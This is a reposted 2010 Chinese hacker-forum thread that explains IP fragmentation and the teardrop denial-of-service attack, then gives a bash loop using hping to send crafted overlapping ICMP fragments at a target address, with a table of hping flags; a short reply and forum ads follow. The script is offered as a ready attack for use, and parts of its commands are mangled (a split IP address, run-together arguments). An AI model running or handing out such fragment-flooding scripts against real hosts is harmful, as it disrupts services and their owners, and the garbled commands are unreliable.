注册
登录
论坛
搜索
插件
默认风格
默认风格_6hOY
D Dark
greenwall
jeans
fashion
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
【3.A.S.T】网络安全爱好者
»
技术交流
» [ 转载]泪滴攻击的原理,以及在Linux下实现
返回列表
发帖
冷酷鲨鱼
发短消息
加为好友
冷酷鲨鱼
当前离线
UID
1618
帖子
430
精华
0
积分
872
威望
761
金钱
804
阅读权限
90
性别
男
在线时间
138 小时
注册时间
2008-11-15
最后登录
2010-7-8
3.A.S.T中校
帖子
430
积分
872
威望
761
金钱
804
在线时间
138 小时
1
楼
跳转到
»
正序看帖
打印
字体大小:
t
T
发表于 2010-4-18 19:32
|
只看该作者
[ 转载]泪滴攻击的原理,以及在Linux下实现
Linux
,
泪滴
,
原理
,
攻击
泪滴攻击是利用ip分片来实现的,首先来了解下ip分片的原理,,
网络中数据链路都有自己的帧格式,例如以太网的帧格式, 目的地址,源地址,类型,数据,FCS
其中,数据字段的长度最大为1500字节,这个数值为MTU (最大传输单位),不同的网络有不同的MTU 值,例如以太网的MTU 是1500 字节,PPP 链路的MTU 值是196字节。。
当ip数数据报封装成帧时,必须符合帧格式的规定,如果ip数据报的总长度小于或等于MTU值,,那么就可以直接封装成一个帧,如果ip数据报的总长度大于MTU 值,就必须分片,
然后将每一个分片封装成一个帧。 ip数据报可以被源主机或在其路径上的任何路由器进行分片,,然后每一个分片经过路由到达目的主机,在进行重装。。我们可以在Linux下使用hping来实现
泪滴攻击,,
命令如下,我在Linux下编辑一个脚本,#!/bin/bash
for ((i=100;i<150;i++)) //持续攻击,所以做了50个循环。。
do
./hping 192.168
1 -1 -x -d 1000 -N 100-c 1
./hping 192.168
1 -1 -d 200 -g 1008 -N 100 -C 1
done
第一条命令是向目标为192.168
1 的主机发送第一个分片,负荷大小为1000 ,ID 为 100
第二条命令是发送第二个分片,设置载荷大小为200 偏移为1008 ,ID 为100
命令参数表如下:
-1 使用ICMP 模式,
-2 使用UDP 模式。
-p 指定目标主机的端口号,,
-i 设置发送时间间隔,
-s 设置SYN 标志,
-a 伪造原ip地址。
-c 发送数据报个数,
-N 设置IP 包的ID
-t 设置TTL
-x 设置 more fragments 标准
-g 设置fragment offest
-C 设置ICMP类型
-d 设置负荷大小
收藏
分享
白痴人才。
冷酷鲨鱼
发短消息
加为好友
冷酷鲨鱼
当前离线
UID
1618
帖子
430
精华
0
积分
872
威望
761
金钱
804
阅读权限
90
性别
男
在线时间
138 小时
注册时间
2008-11-15
最后登录
2010-7-8
3.A.S.T中校
帖子
430
积分
872
威望
761
金钱
804
在线时间
138 小时
2
楼
发表于 2010-4-22 18:42
|
只看该作者
看不懂。
白痴人才。
TOP
返回列表
【 新 手 入 门 】
初入江湖
有问必答
软件交流
程序设计
黑客播报
操作系统
Windows专区
Unix 专区
【 技 术 交 流 】
原创专区
QQ技巧
反黑知识
网站建设
教程发布
技术交流
免杀技术
0day发布
专题归类
私服技术
【 论 坛 水 区 】
被黑站点
激情灌水
极品贴图
开心乐园
影音专区
广告专区
【 论 坛 管 理 】
新人报到
论坛管理
勋章申请
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
全国地图
@@@ 加入本站会员 一个月月赚1200+的秘密@@@
@@@ 加入本站会员 一个月月赚1200+的秘密@@@